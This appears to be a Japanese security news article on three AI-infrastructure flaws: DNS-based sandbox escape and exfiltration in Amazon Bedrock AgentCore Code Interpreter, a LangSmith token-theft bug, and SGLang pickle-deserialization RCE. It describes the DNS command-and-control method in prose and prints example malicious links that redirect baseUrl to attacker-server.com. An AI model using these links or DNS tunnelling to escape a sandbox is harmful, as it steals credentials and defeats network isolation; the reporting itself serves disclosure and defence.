サイバーセキュリティ研究者らは、ドメインネームシステム（DNS）クエリを利用して、人工知能（AI）コード実行環境から機密データを漏洩させる新たな手法を明らかにしました。これらの発見は、**LangSmith**および**SGLang**に関する個別の開示と合わせて、AIインフラストラクチャにおける堅牢なセキュリティ対策の必要性が高まっていることを浮き彫りにしています。  ### Amazon Bedrock AgentCore Code Interpreterの脆弱性 今週公開された**BeyondTrust**のレポートによると、**Amazon Bedrock AgentCore Code Interpreter**のサンドボックスモードがアウトバウンドDNSクエリを許可しており、攻撃者がインタラクティブシェルを確立し、ネットワーク分離を回避できる可能性が示されています。現在**CVE**識別子がないこの問題には、CVSSスコア7.5/10.0が割り当てられています。 2025年8月にローンチされた**Amazon Bedrock AgentCore Code Interpreter**は、AIエージェントが隔離されたサンドボックス環境内で安全にコードを実行できるように設計されており、エージェントワークロードが外部システムにアクセスするのを防ぎます。 **BeyondTrust**のチーフセキュリティアーキテクトである**Kinnaird McQuade**氏は、「ネットワークアクセスなし」の設定にもかかわらず、サービスがDNSクエリを許可しているという事実は、「脅威アクターが特定のシナリオでDNS経由でコマンド＆コントロールチャネルを確立し、データを漏洩させることを可能にし、期待されるネットワーク分離制御を回避する可能性がある」と述べています。 概念実証攻撃において、研究者らは脅威アクターがこの動作を利用してDNSクエリと応答を介した双方向通信チャネルを確立する方法を実証しました。これにより、インタラクティブなリバースシェルを取得し、DNSクエリを介して機密情報を漏洩させ（IAMロールが**AWS**リソース、例えば**S3**バケットにアクセスするための必要な権限を持っていると仮定）、コマンドを実行することが可能になります。 さらに、DNS通信チャネルは、Code Interpreterに追加のペイロードを配信するために悪用される可能性があり、DNSコマンド＆コントロール（C2）サーバーからDNS Aレコードに保存されたコマンドをポーリングし、それを実行し、DNSサブドメインクエリを介して結果を返すように促します。 研究者らは、IAMロールの設定ミスが問題を悪化させる可能性があると強調しました。サービスに割り当てられた過剰な権限を持つロールは、機密データにアクセスするための過度に広範な権限を付与する可能性があります。 **BeyondTrust**は、「この研究は、DNS解決がサンドボックス化されたコードインタープリターのネットワーク分離保証をどのように損なう可能性があるかを示しています。この手法を使用することで、攻撃者はCode InterpreterのIAMロールからアクセス可能なAWSリソースから機密データを漏洩させ、ダウンタイム、機密性の高い顧客情報のデータ侵害、またはインフラストラクチャの削除を引き起こす可能性があります。」と述べています。  2025年9月の責任ある開示の後、**Amazon**はこの動作を欠陥ではなく意図された機能と分類しました。同社は、完全なネットワーク分離のためにサンドボックスモードではなくVPCモードの使用を推奨し、アウトバウンドDNSトラフィックをフィルタリングするためにDNSファイアウォールの使用を提案しています。 **Sectigo**の上級フェローである**Jason Soroko**氏は、「機密性の高いワークロードを保護するために、管理者はすべてのアクティブなAgentCore Code Interpreterインスタンスを棚卸しし、クリティカルなデータを処理しているインスタンスを直ちにサンドボックスモードからVPCモードに移行する必要があります。」とアドバイスしています。 同氏はさらに、「VPC内で運用することで、堅牢なネットワーク分離に必要なインフラストラクチャが提供され、チームは厳格なセキュリティグループ、ネットワークACL、およびRoute53 Resolver DNSファイアウォールを実装して、不正なDNS解決を監視およびブロックできます。最後に、セキュリティチームはこれらのインタープリターにアタッチされているIAMロールを厳密に監査し、潜在的な侵害の被害範囲を制限するために最小権限の原則を厳格に適用する必要があります。」と付け加えています。  ### LangSmithのアカウント乗っ取り脆弱性 関連ニュースとして、**Miggo Security**は**LangSmith**（**CVE-2026-25750**、CVSSスコア: 8.5）における高深刻度のセキュリティ欠陥を開示しました。これはトークン盗難とアカウント乗っ取りにつながる可能性があります。セルフホスト型およびクラウド展開の両方に影響するこの問題は、2025年12月にリリースされた**LangSmith**バージョン0.12.71で修正されました。 この脆弱性は、baseUrlパラメータの検証不足に起因し、URLパラメータインジェクションを許可します。攻撃者は、ユーザーに特別に細工されたリンクをクリックさせることでこれを悪用し、ベアラートークン、ユーザーID、ワークスペースIDを盗むことができます。例として、以下のリンクが挙げられます。 * クラウド - smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com * セルフホスト型 - <LangSmith_domain_of_the_customer>/studio/?baseUrl=https://attacker-server.com 悪用に成功すると、AIのトレース履歴への不正アクセスが可能になり、ツール呼び出しのレビューを通じて内部SQLクエリ、CRM顧客レコード、または独自のソースコードが漏洩する可能性があります。 **Miggo**の研究者である**Liad Eliyahu**氏と**Eliana Vuijsje**氏は、「ログイン済みのLangSmithユーザーは、攻撃者が制御するサイトにアクセスするだけで、または悪意のあるリンクをクリックするだけで侵害される可能性があります。」と述べています。  同氏はさらに、「この脆弱性は、AIオブザーバビリティプラットフォームが現在クリティカルなインフラストラクチャになっていることを思い出させます。これらのツールは開発者の柔軟性を優先するため、しばしば意図せずセキュリティガードレールをバイパスします。AIエージェントは『従来の』ソフトウェアと同様に、内部データソースやサードパーティサービスに深くアクセスできるため、このリスクは増大します。」と付け加えています。 ### SGLangにおける安全でないPickleデシリアライゼーションの脆弱性 最後に、大規模言語モデルおよびマルチモーダルAIモデルのサービングに広く使用されているオープンソースフレームワークである**SGLang**に脆弱性が特定されました。悪用に成功すると、安全でないpickleデシリアライゼーションが発生し、リモートコード実行につながる可能性があります。 Orcaセキュリティ研究者の**Igor Stepansky**氏によって発見されたこれらの脆弱性は、まだパッチが適用されていません。脆弱性は以下の通りです。 * **CVE-2026-3059**（CVSSスコア: 9.8）- ZeroMQ（別名ZMQ）ブローカーを介した認証されていないリモートコード実行の脆弱性。これは、認証なしでpickle.loads()を使用して信頼されていないデータをデシリアライズします。SGLangのマルチモーダル生成モジュールに影響します。 * **CVE-2026-3060**（CVSSスコア: 9.8）- 分離モジュールを介した認証されていないリモートコード実行の脆弱性。これは、認証なしでpickle.loads()を使用して信頼されていないデータをデシリアライズします。SGLangに影響します。